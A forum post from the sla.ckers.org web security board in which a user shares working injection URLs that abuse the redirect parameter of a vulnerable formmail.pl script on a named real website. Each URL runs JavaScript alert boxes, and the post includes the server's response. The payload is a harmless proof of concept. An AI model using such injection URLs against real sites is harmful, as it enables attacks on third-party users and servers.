formamil.pl javascript alert tag plus html alert tag within javascript tag

sla.ckers.org is
ha.ckers sla.cking

Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc....

Go to Topic: Previous•Next

Go to: Forum List•Message List•New Topic•Search•Log In

formamil.pl javascript alert tag plus html alert tag within javascript tag

Posted by: johndoe

Date: February 05, 2012 11:37AM

hello guys i just found out by my own how to include html within javascript... a working link with vulnerable formmail is here:

http://apo rre alo s.com/cgi-sys/formmail.pl?recipient=martin@aporrealos.com&subject=1&redirect=javascript:alert%28123%29;alert%28document.write.value=%3Ch1%3EHello%20%3C/h1%3E%29;

notice URL encoding...

the original formmail javascript injection was

http://apo rr ealo s.com/cgi-sys/formmail.pl?recipient=martin@aporrealos.com&subject=1&redirect=javascript:alert(123);alert(document.write.value=<h1>Hello</h1>);

I used this in Firefox version 7,,,,, When i copied it here the message board system automatically encoded the tags and parenthesis.

after i injected the code i got a 302 error that looked like this:

Found

The document has moved here.
Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.6 Phusion_Passenger/3.0.9 mod_bwlimited/1.4 Server at aporrealos.com Port 80

123 alert box popped up and later a Hello alert boxed popped up

Edited 1 time(s). Last edit at 02/05/2012 11:38AM by johndoe.

Options: Reply•Quote

Re: formamil.pl javascript alert tag plus html alert tag within javascript tag